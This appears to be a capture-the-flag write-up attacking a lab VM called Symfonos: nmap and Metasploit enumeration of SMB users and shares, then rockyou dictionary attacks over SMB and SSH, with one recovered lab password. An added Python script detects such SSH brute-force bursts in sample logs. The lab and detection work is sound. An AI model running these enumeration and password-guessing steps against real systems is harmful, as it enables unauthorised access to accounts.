Symfonos


em50l@jejo.es$ nmap -sC -A 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:29 CEST
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

OS: Windows 6.1 (Samba 4.5.16-Debian)
Computer name: symfonos
account_used: guest
authentication_level: user

HTTP directory search:

em50l@jejo.es$ nmap  192.168.56.101 -p 80 --script http-enum

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:23 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /manual/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds

User information:

msf5 > use auxiliary/scanner/smb/smb_enumusers
(reverse-i-search)`': setg Interrupt: use the 'exit' command to quit
msf5 auxiliary(scanner/smb/smb_enumusers) > setg rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.101:139    - SYMFONOS [ helios ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5> use auxiliary/scanner/smb/smb_lookupsid 
msf5 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.56.101:139    - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:139    - USER=nobody RID=501
[*] 192.168.56.101:445    - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:445    - USER=nobody RID=501
[*] 192.168.56.101:445    - GROUP=None RID=513
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 > use auxiliary/scanner/smb/smb_enumshares 
msf5 auxiliary(scanner/smb/smb_enumshares) > run

[+] 192.168.56.101:139    - print$ - (DS) Printer Drivers
[+] 192.168.56.101:139    - helios - (DS) Helios personal share
[+] 192.168.56.101:139    - anonymous - (DS) 
[+] 192.168.56.101:139    - IPC$ - (I) IPC Service (Samba 4.5.16-Debian)
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If I browse to the URL smb://192.168.56.101/ I see the same thing.

A dictionary attack on SMB????

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > show options 

Module options (auxiliary/scanner/smb/smb_login):
...
...
...
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/smb/smb_login) > set smbuser helios 
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.56.101:445    - 192.168.56.101:445 - Starting SMB login bruteforce
[-] 192.168.56.101:445    - 192.168.56.101:445 - Failed: '.\helios:123456',
[-] 192.168.56.101:445    - 192.168.56.101:445 - Failed: '.\helios:ashley',
...
...
[+] 192.168.56.101:445    - 192.168.56.101:445 - Success: '.\helios:qwerty'
^C[*] 192.168.56.101:445    - Caught interrupt from the console...
[*] Auxiliary module execution completed

A dictionary attack on SSH???

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):
...
...
...
msf5 auxiliary(scanner/ssh/ssh_login) > set username helios
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose yes
msf5 auxiliary(scanner/ssh/ssh_login) > run

[-] 192.168.56.101:22 - Failed: 'helios:123456'
[-] 192.168.56.101:22 - Failed: 'helios:12345'
[-] 192.168.56.101:22 - Failed: 'helios:123456789'
[-] 192.168.56.101:22 - Failed: 'helios:password'
[-] 192.168.56.101:22 - Failed: 'helios:iloveyou'
[-][-][-]

No result..
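
The ssh_login run above as it looks from the server side: an added example (not part of the original write-up) that flags a burst of failed logins for one account from one source in sshd's auth log, and any accepted login that follows such a burst. It assumes the standard OpenSSH syslog message format; the log lines, the source addresses and the threshold/window values are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd auth.log lines (not captured from the target);
# 192.168.56.102 is an assumed attacker address on the lab network.
SAMPLE_LOG = """\
Jul 21 00:41:01 symfonos sshd[1201]: Failed password for helios from 192.168.56.102 port 40112 ssh2
Jul 21 00:41:03 symfonos sshd[1201]: Failed password for helios from 192.168.56.102 port 40112 ssh2
Jul 21 00:41:05 symfonos sshd[1203]: Failed password for helios from 192.168.56.102 port 40114 ssh2
Jul 21 00:41:07 symfonos sshd[1203]: Failed password for helios from 192.168.56.102 port 40114 ssh2
Jul 21 00:41:09 symfonos sshd[1205]: Failed password for helios from 192.168.56.102 port 40116 ssh2
Jul 21 00:41:11 symfonos sshd[1207]: Accepted password for helios from 192.168.56.102 port 40118 ssh2
Jul 21 09:15:30 symfonos sshd[1350]: Failed password for helios from 192.168.56.1 port 51822 ssh2
Jul 21 09:15:41 symfonos sshd[1350]: Accepted password for helios from 192.168.56.1 port 51822 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

def detect_dictionary_attack(log_text, threshold=5, window=timedelta(seconds=60), year=2019):
    """Alert on >= threshold failures per (source, user) inside the window, and on
    an accepted login that arrives while such a burst is still inside the window."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["src"], m["user"])
        q = recent[key]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) == threshold:       # alert once, when the burst crosses the threshold
                alerts.append(("bruteforce", *key, ts.isoformat()))
        elif len(q) >= threshold:         # accepted login on top of an active burst
            alerts.append(("success_after_bruteforce", *key, ts.isoformat()))
            q.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect_dictionary_attack(SAMPLE_LOG):
        print(alert)
```

The single mistyped password from 192.168.56.1 followed by a successful login stays below the threshold and raises no alert.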